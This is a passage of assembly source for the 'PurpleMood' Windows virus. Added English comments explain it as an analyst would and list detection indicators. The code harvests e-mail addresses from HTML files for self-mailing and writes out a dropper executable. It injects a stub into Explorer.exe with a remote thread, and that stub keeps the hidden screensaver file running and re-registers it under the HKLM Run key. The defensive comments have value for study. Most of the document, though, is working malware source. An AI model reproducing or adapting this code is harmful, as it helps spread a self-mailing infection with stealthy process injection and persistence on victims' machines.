PurpleMood 紫色心情病毒源代码(续)
pushad
push 0
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push 0
push FILE_SHARE_READ
push GENERIC_READ
push FileName
call _CreateFile[ebx]
or eax,eax
jz PH_Exit
mov hFile , eax
xor eax,eax
push eax
push eax
push eax
push PAGE_READONLY
push eax
push hFile
call _CreateFileMapping[ebx]
or eax,eax
jz PH_Close
mov hMapping,eax
xor eax,eax
push eax
push eax
push eax
push FILE_MAP_READ
push hMapping
call _MapViewOfFile[ebx]
or eax,eax
jz PH_Close2
xchg eax,esi ;esi = pMapping
push 0
push hFile
mov eax , 12345678h
_GetFileSize = dword ptr $-4
call eax
sub eax,16 ;For security
add eax,esi
mov SafeFSize,eax ;esi must be below SafeFSize
.while esi < SafeFSize
xor edx,edx ;Valid = FALSE
@pushsz 'mailto:
pop edi
push 7 ;strlen of 'mailto:
pop ecx
repz cmpsb
.if zero? ;找到 mailto:
lea edi,[offset TempMailTo+ebx]
push edi
.while esi<SafeFSize
lodsb
.if al==' '
.continue
.elseif al=='>' || al=='"' ||al==''''||al=='<'
xor al,al
stosb
.break
.elseif al=='@'
stosb
inc edx
.else
stosb
.endif
.endw
pop edi
.if edx==1
call SendMail
.endif
.endif
inc esi
.endw
PH_Close3:
push esi
call _UnmapViewOfFile[ebx]
PH_Close2:
push hMapping
call _CloseHandle[ebx]
PH_Close:
push hFile
call _CloseHandle[ebx]
PH_Exit:
popad
ret 4
Parse_HTM ENDP
;****************************
;data used by SendMail
;****************************
;-----------------------------------------------------------------------
; Data used by SendMail (SendMail itself is not in this part of the file).
; WSA_Data / VSocket / _send : Winsock state; presumably filled in by
;   SendMail at run time (WSAStartup output, socket handle, send() address)
;   — TODO confirm against the caller.
; Base64_Encoded_Data : dword, presumably a pointer to an encoded buffer.
; Base64DecodeTable : despite the name this is the standard 64-character
;   Base64 *alphabet* (A-Z, a-z, 0-9, '+', '/'), i.e. an encoding table.
;   SizeOfBase64DecodeTable evaluates to 64.
;-----------------------------------------------------------------------
WSA_Data WSADATA <>                      ; WSAStartup output structure
VSocket dd 0                             ; socket handle (assumed; set elsewhere)
_send dd 0                               ; address slot, presumably send()
Base64_Encoded_Data dd 0
Base64DecodeTable equ $                  ; table starts here (no bytes emitted by equ)
db 'A','B','C','D','E','F','G','H','I','J'
db 'K','L','M','N','O','P','Q','R','S','T'
db 'U','V','W','X','Y','Z','a','b','c','d'
db 'e','f','g','h','i','j','k','l','m','n'
db 'o','p','q','r','s','t','u','v','w','x'
db 'y','z','0','1','2','3','4','5','6','7'
db '8','9','+','/'
SizeOfBase64DecodeTable equ $-Base64DecodeTable   ; = 64 bytes
;********CreatePE**********************
;-----------------------------------------------------------------------
; CreatePE
; Purpose: writes a new PE file to the path in szFilePath, using the
;          header template MDosStub..VEnd (defined further down) for the
;          first 200h bytes, followed by VRAW_SIZE bytes starting at
;          VStart (VStart is not in this part of the file).
; In:      ebx = relocation delta; every data label is addressed as
;          [offset label + ebx]. szFilePath must already be filled in.
; Out:     nothing (pushad/popad restores all registers). The file is
;          opened CREATE_NEW, so an existing file is not overwritten.
; Analyst notes: this is the dropper step. The two WriteFile results are
;          not checked; only a 0 return from CreateFile is treated as a
;          failure. The dropped image carries the section name '.xjs'
;          and the fixed TimeDateStamp from MFileHeader, both usable as
;          static indicators.
;-----------------------------------------------------------------------
CreatePE PROC
LOCAL ByteWrite:DWORD                    ; lpNumberOfBytesWritten cell for WriteFile
pushad
lea eax , [offset szFilePath+ebx]        ; eax = relocated path string
push NULL                                ; hTemplateFile
push FILE_ATTRIBUTE_NORMAL
push CREATE_NEW                          ; fails if the file already exists
push NULL                                ; lpSecurityAttributes
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push eax                                 ; lpFileName
call _CreateFile[ebx]                    ; API address read from the patched slot
or eax,eax
jz CT_Exit                               ; only eax == 0 is treated as failure here
xchg eax,esi                             ; esi = hFile
lea edi,ByteWrite
push 0                                   ; lpOverlapped
push edi                                 ; lpNumberOfBytesWritten
push 200h                                ; headers fit in < 200h and FileAlignment = 200h
lea eax,[offset MDosStub+ebx]
push eax
push esi                                 ; esi = hFile
call _WriteFile[ebx]                     ; write DOS stub, NT header, section header
push 0
push edi
push VRAW_SIZE                           ; raw size of the single section
lea eax,[offset VStart+ebx]
push eax
push esi
call _WriteFile[ebx]                     ; write code and import table
push esi
call _CloseHandle[ebx]
CT_Exit:
popad
ret
CreatePE ENDP
;*************MonitorThread********************************
;Enum所有活动进程,插入rtThreadStart->rtThreadEnd的代码,监视PurpleMood.scr
;的运行和注册表的Run项.
;**********************************************************
;-----------------------------------------------------------------------
; MonitorThread(MReloc)   -- stdcall, one DWORD argument
; Purpose: resolves three PSAPI exports, enumerates running process IDs
;          and hands each one to AnalyseProcess (which injects the
;          rtThreadStart..rtThreadEnd stub into Explorer.exe).
; In:      MReloc = relocation delta; loaded into ebx and used by every
;          [offset label + ebx] reference here and in AnalyseProcess.
; Out:     ret 4 pops the argument; eax undefined. ebx/esi/edi are
;          clobbered (no pushad in this procedure).
; Analyst notes: LoadLibraryA('PSAPI') followed by GetProcAddress of
;          EnumProcesses / EnumProcessModules / GetModuleBaseNameA is the
;          process-discovery stage that precedes the remote-thread
;          injection in AnalyseProcess; the resolved addresses are
;          written into immediate operands (self-patching code).
;-----------------------------------------------------------------------
MonitorThread PROC MReloc : DWORD
mov ebx , MReloc
@pushsz 'PSAPI'                          ; macro (not shown); presumably pushes the address of an inline string
call _LoadLibraryA[ebx]
xchg eax,esi                             ; esi = hPSAPI
@pushsz 'EnumProcesses'
push esi
call _GetProcAddress[ebx]
mov _EnumProcesses[ebx],eax              ; patch the immediate slot used below
@pushsz 'EnumProcessModules'
push esi
call _GetProcAddress[ebx]
mov _EnumProcessModules[ebx],eax         ; slot lives inside AnalyseProcess
@pushsz 'GetModuleBaseNameA'
push esi
call _GetProcAddress[ebx]
mov _GetModuleBaseNameA[ebx],eax         ; slot lives inside AnalyseProcess
lea esi,[offset procz + ebx]             ; esi = PID array
lea edi,[offset tmp + ebx]               ; edi = &bytes-returned
push edi                                 ; lpcbNeeded
push 128                                 ; cb, in bytes
push esi                                 ; lpidProcess
mov eax,12345678h
_EnumProcesses = dword ptr $-4           ; immediate patched above with the real address
call eax                                 ; enumerate all running processes
dec eax
jne MT_Exit                              ; continue only on a return value of exactly 1
add esi,4                                ; advance past the first entry of the PID array
p_search:
lodsd                                    ; eax = next PID
test eax,eax
je MT_Exit                               ; loop ends at the first zero PID (tmp is never read)
call AnalyseProcess                      ; try to inject into this process
jmp p_search
MT_Exit:
ret 4
MonitorThread ENDP
;-----------------------------------------------------------------------
; AnalyseProcess
; Purpose: given a process ID, checks whether the process's first module
;          is named 'Explorer.exe' and, if so, copies the position-
;          independent stub rtThreadStart..rtThreadEnd into that process
;          and starts it as a remote thread.
; In:      eax = process ID; ebx = relocation delta.
; Out:     none (pushad/popad). Side effect: hProcess — an immediate
;          operand inside this procedure — is overwritten with the opened
;          handle; the handle is not closed in this procedure.
; Analyst notes: the API chain OpenProcess -> EnumProcessModules ->
;          GetModuleBaseNameA -> lstrcmpi('Explorer.exe') ->
;          VirtualAllocEx -> WriteProcessMemory -> CreateRemoteThread is
;          the classic remote-thread injection pattern that behavioural
;          detection rules key on. The written payload is exactly
;          rtThreadEnd - rtThreadStart bytes, allocated PAGE_READWRITE.
;-----------------------------------------------------------------------
AnalyseProcess Proc
pushad
push eax                                 ; dwProcessId
push 0                                   ; bInheritHandle = FALSE
; NOTE(review): the next two lines are one 'push' whose operand list was
; wrapped by the page extraction ("P" / "ROCESS_VM_READ").
push PROCESS_VM_OPERATION or PROCESS_CREATE_THREAD or PROCESS_VM_WRITE or P
ROCESS_VM_READ or PROCESS_QUERY_INFORMATION
mov eax,12345678h
_OpenProcess = dword ptr $-4             ; address slot, patched elsewhere
call eax                                 ; PID -> handle
or eax,eax
jz AP_Exit
mov hProcess[ebx],eax                    ; store the handle into the immediate of 'push 12345678h' below
lea esi,[offset modz + ebx]              ; esi = receives one HMODULE
lea ecx,[offset tmp + ebx]
push ecx                                 ; lpcbNeeded
push 4                                   ; cb = room for one module handle
push esi                                 ; lphModule
push hProcess[ebx]
mov eax,12345678h
_EnumProcessModules = dword ptr $-4      ; patched by MonitorThread
call eax                                 ; get first (main) module
dec eax
jne AP_Exit                              ; proceed only on a return value of exactly 1
lodsd                                    ; eax = hModule of the main module
lea edi,[offset mod_name + ebx]
push MAX_PATH                            ; nSize
push edi                                 ; lpBaseName
push eax                                 ; hModule
push hProcess[ebx]
mov eax,12345678h
_GetModuleBaseNameA = dword ptr $-4      ; patched by MonitorThread
call eax                                 ; copy the module's base name into mod_name
test eax,eax
je AP_Exit                               ; 0 characters copied -> give up
@pushsz 'Explorer.exe'
push edi
call _lstrcmpi[ebx]                      ; case-insensitive compare with mod_name
jnz AP_Exit                              ; no explicit test of eax precedes this jump
lea esi,[offset rtThreadStart + ebx]     ; esi = local copy of the stub
mov edi,rtThreadEnd - rtThreadStart      ; edi = stub size in bytes
push PAGE_READWRITE                      ; flProtect
push MEM_RESERVE or MEM_COMMIT
push edi                                 ; dwSize
push 0                                   ; lpAddress = let the system choose
push 12345678h
hProcess = dword ptr $-4                 ; this immediate is the process handle (written above)
mov eax,12345678h
_VirtualAllocEx = dword ptr $-4
call eax                                 ; allocate memory for the stub in the target
test eax,eax
je AP_Exit
xchg eax,ebp                             ; ebp = remote base address
push 0                                   ; lpNumberOfBytesWritten = NULL
push edi                                 ; nSize
push esi                                 ; lpBuffer = local stub
push ebp                                 ; lpBaseAddress
push dword ptr [ebx + offset hProcess]
mov eax,12345678h
_WriteProcessMemory = dword ptr $-4
call eax                                 ; copy the stub into the target
dec eax
jne AP_FreeMem                           ; on failure release the remote allocation
xor edx,edx
push edx                                 ; lpThreadId = NULL
push edx                                 ; dwCreationFlags = 0
push edx                                 ; lpParameter = NULL
push ebp                                 ; lpStartAddress = remote copy of rtThreadStart
push edx                                 ; dwStackSize = 0
push edx                                 ; lpThreadAttributes = NULL
push dword ptr hProcess[ebx]
mov eax,12345678h
_CreateRemoteThread = dword ptr $-4
call eax                                 ; start the stub as a thread inside Explorer.exe
jmp AP_Exit                              ; the thread now owns the allocation; skip the free path
AP_FreeMem:
push MEM_RELEASE                         ; dwFreeType
push 0                                   ; dwSize (0 with MEM_RELEASE)
push ebp                                 ; lpAddress
push dword ptr hProcess[ebx]
mov eax,12345678h
_VirtualFreeEx = dword ptr $-4
call eax                                 ; free the remote memory
AP_Exit :
popad
ret
AnalyseProcess EndP
; Scratch buffers for MonitorThread / AnalyseProcess; all are addressed
; as [offset label + ebx].
procz dd 128 dup (?)                     ; PID array filled by EnumProcesses (cb passed = 128 bytes)
dd ?                                     ; one extra dword following the array
modz dd ?                                ; receives the first HMODULE from EnumProcessModules
mod_name db MAX_PATH dup (?)             ; base name of that module, compared with 'Explorer.exe'
tmp dd ?                                 ; lpcbNeeded cell shared by both PSAPI calls
;-----------------------------------------------------------------------
; rtThreadStart..rtThreadEnd : position-independent stub that
; AnalyseProcess copies into Explorer.exe and runs as a remote thread.
; Layout matters: AnalyseProcess copies exactly rtThreadEnd - rtThreadStart
; bytes; the 12345678h immediates are address slots that must hold real
; API addresses before the copy (the code that fills most of them is not
; in this part of the file); the strings nGetProcAddress and szFilePath
; are data embedded in the stub and reached via the call/return-address
; trick.
; Behaviour, once per minute, forever:
;   - OpenMutex(1, FALSE, lpName) where lpName is the string at
;     nGetProcAddress, i.e. the running .scr is detected by a mutex named
;     "GetProcAddress" (indicator).
;   - if that mutex is absent: WinExec(szFilePath, SW_HIDE).
;   - in both cases: SHSetValueA(HKLM,
;     'Software\Microsoft\Windows\CurrentVersion\Run', 'PurpleMood',
;     REG_SZ, szFilePath, SCRPathSize)  — Run-key persistence (indicator).
; Registers: ebx = delta computed by the call/pop at rtStart; esi scratch.
;-----------------------------------------------------------------------
rtThreadStart:
call rtStart
rtStart:
pop ebx                                  ; ebx = runtime address of rtStart
sub ebx , offset rtStart                 ; ebx = runtime minus link-time address
call rtInit
rtWork:
call MakeSCRAlive
push 1000*60                             ; 60 000 ms
mov eax , 12345678h
_Sleep = dword ptr $ - 4                 ; address slot: Sleep
call eax
jmp short rtWork                         ; never returns; the thread loops until the host exits
rtInit:
@pushsz 'shlwapi.dll'
mov eax , 12345678h
_LoadLibraryA = dword ptr $ - 4          ; address slot: LoadLibraryA
call eax
@pushsz 'SHSetValueA'
push eax                                 ; hModule = shlwapi
mov eax , 12345678h
_GetProcAddress = dword ptr $ - 4        ; address slot: GetProcAddress
call eax
mov _SHSetValueA[ebx],eax                ; patch the slot used in RegistSCR
ret
MakeSCRAlive:
call @RT1                                ; pushes the address of the string below as its return address
nGetProcAddress db 'GetProcAddress',0    ; used as the mutex NAME (lpName), despite the label
@RT1: push FALSE                         ; bInheritHandle
push 1                                   ; dwDesiredAccess
mov eax , 12345678h
_OpenMutex = dword ptr $ - 4             ; address slot: OpenMutex
call eax
xchg esi,eax                             ; esi = mutex handle, or NULL if not found
.if esi == NULL                          ; .scr not running -> start it
jmp RunSCR
.else                                    ; running: drop our handle, then refresh the Run value
push esi
mov eax , 12345678h
_ReleaseMutex = dword ptr $ - 4          ; address slot: ReleaseMutex
call eax
push esi
mov eax , 12345678h
_CloseHandle = dword ptr $ - 4           ; address slot: CloseHandle (same slot CreatePE reads as _CloseHandle[ebx])
call eax
jmp RegistSCR
.endif
RunSCR:
push SW_HIDE                             ; uCmdShow
call @RT2                                ; pushes the address of szFilePath as lpCmdLine
szFilePath db 50 dup (0)                 ; path of the dropped file; filled in elsewhere (presumably ends in szFileName)
@RT2: mov eax , 12345678h
_WinExec = dword ptr $ - 4               ; address slot: WinExec
call eax
RegistSCR:
lea eax,[offset szFilePath+ebx]
push 12345678h
SCRPathSize = dword ptr $-4              ; cbData slot; patched elsewhere with the path length
push eax                                 ; pvData = szFilePath
push REG_SZ                              ; dwType
@pushsz 'PurpleMood'                     ; pszValue
@pushsz 'Software\Microsoft\Windows\CurrentVersion\Run'   ; pszSubKey
push HKEY_LOCAL_MACHINE                  ; hkey
mov eax,12345679h
_SHSetValueA = dword ptr $-4             ; patched by rtInit with the SHSetValueA address
call eax                                 ; writes HKLM\...\Run\PurpleMood = szFilePath
ret
rtThreadEnd:
;*************Virus Data******************************
; Virus data. Signature is a fixed string (Chinese: "Purple Mood, your
; eternal expectation"); presumably used as an infection marker — it is a
; usable static indicator. Keep the bytes exact.
Signature db '紫色心情,你永远的期待',0
HostEntry dd 0                           ; presumably the original host entry point; set elsewhere
hKernel32 dd 0                           ; kernel32 base, resolved elsewhere
szEXEPath db MAX_PATH dup (0)            ; path buffer (MAX_PATH bytes)
szFileName db '\PurpleMood.scr',0        ; dropped file name (indicator)
FNameSize = $ - szFileName               ; = 16 bytes including the terminator
wfd WIN32_FIND_DATA <>                   ; FindFirstFile/FindNextFile output structure
;*****************PE Data*****************************
;-----------------------------------------------------------------------
; Template of the PE file written by CreatePE: CreatePE writes 200h bytes
; starting at MDosStub as the header, then VRAW_SIZE bytes from VStart.
; '@' is an adjustment term added to every pointer below; it is defined
; elsewhere (presumably converts a file offset into an RVA) — confirm.
; Static indicators of the dropped file: section name '.xjs',
; TimeDateStamp 3cbe5cc2h, a single import (User32.dll!MessageBoxA),
; linker version 5.12, ImageBase 400000h, SizeOfImage 3000h.
;-----------------------------------------------------------------------
VImports:                                ; IMAGE_IMPORT_DESCRIPTOR (one entry)
dd offset Kernel32_Pointers + @          ; OriginalFirstThunk
dd -1,-1                                 ; TimeDateStamp, ForwarderChain
dd offset Kernel32_Name + @              ; Name -> 'User32.dll'
VIAT:
dd offset Kernel32_Relocated + @         ; FirstThunk (the IAT)
db 14 dup (0)                            ; zero bytes after the descriptor
Kernel32_Pointers dd offset Kernel32_Beep + @ , 0    ; import name table: one thunk + terminator
Kernel32_Relocated dd offset Kernel32_Beep + @ , 0   ; IAT: same thunk, overwritten by the loader
Kernel32_Beep db ?,?,'MessageBoxA',0     ; IMAGE_IMPORT_BY_NAME: 2-byte hint + name (labels say Kernel32/Beep, bytes say User32/MessageBoxA)
Kernel32_Name db 'User32.dll',0
MDosStub:                                ; 64-byte IMAGE_DOS_HEADER; e_lfanew at offset 3Ch = 40h
db 4Dh,5Ah,90h,00,03,00, 00, 00, 04, 00, 00,00,0FFh,0FFh,00,00
db 0B8h,00,00,00, 00, 00, 00, 00,40h, 00, 00, 00, 00, 00,00,00
db 00, 00, 00,00,00,00, 00, 00, 00, 00, 00, 00, 00, 00, 00, 00
db 00, 00, 00, 00,00,00,00,00, 00, 00, 00, 00, 40h, 00, 00, 00
db 50h,45h,00,00                         ; 'PE\0\0' signature at offset 40h
MFileHeader:                             ; IMAGE_FILE_HEADER
Machine dw 14Ch                          ; IMAGE_FILE_MACHINE_I386
NumberOfSections dw 1
TimeDateStamp dd 3cbe5cc2h               ; fixed build timestamp (indicator)
PointerToSymbolTable dd 0
NumberOfSymbols dd 0
SizeOfOptionalHeader dw 0e0h             ; standard PE32 optional header size
Characteristics dw 10fh                  ; RELOCS_STRIPPED | EXECUTABLE_IMAGE | LINE_NUMS_STRIPPED | LOCAL_SYMS_STRIPPED | 32BIT_MACHINE
MIMAGE_OPTIONAL_HEADER32:
Magic dw 10bh                            ; PE32
MajorLinkerVersion db 5
MinorLinkerVersion db 12
SizeOfCode dd VRAW_SIZE
SizeOfInitializedData dd 0
SizeOfUninitializedData dd 0
AddressOfEntryPoint dd 1000h             ; entry = start of the single section
BaseOfCode dd 1000h
BaseOfData dd 3000h
ImageBase dd 400000h
SectionAlignment dd 1000h
FileAlignment dd 200h
MajorOperatingSystemVersion dw 4
MinorOperatingSystemVersion dw 0
MajorImageVersion dw 0
MinorImageVersion dw 0
MajorSubsystemVersion dw 4
MinorSubsystemVersion dw 0
Win32VersionValue dd 0
SizeOfImage dd 3000h;the author's note says this value still needs adjusting
SizeOfHeaders dd 200h
CheckSum dd 0
Subsystem dw 2 ;(Windows GUI)
DllCharacteristics dw 0
SizeOfStackReserve dd 100000h
SizeOfStackCommit dd 1000h
SizeOfHeapReserve dd 100000h
SizeOfHeapCommit dd 1000h
LoaderFlags dd 0
NumberOfRvaAndSizes dd 10h               ; 16 data directory entries follow
DataDirectory dd 0,0                     ; [0] export: none
dd offset VImports+@,VIMPORT_SIZE        ; [1] import table
dd 14h dup(0)                            ; [2]..[11] empty (10 entries)
dd offset VIAT + @,8                     ; [12] IAT: one thunk + terminator
dd 0,0,0,0,0,0                           ; [13]..[15] empty
MIMAGE_SECTION_HEADER:                   ; the single IMAGE_SECTION_HEADER
Name1 db '.xjs',0,0,0,0                  ; section name (indicator)
VirtualSize dd offset VEnd - offset VStart
VirtualAddress dd 1000h
SizeOfRawData dd VRAW_SIZE
PointerToRawData dd 200h                 ; matches the 200h-byte header CreatePE writes first
PointerToRelocations dd 0
PointerToLinenumbers dd 0
NumberOfRelocations dw 0
NumberOfLinenumbers dw 0
Characteristic dd 0E0000020h             ; CNT_CODE | MEM_EXECUTE | MEM_READ | MEM_WRITE
VEnd:
CODE ends
end main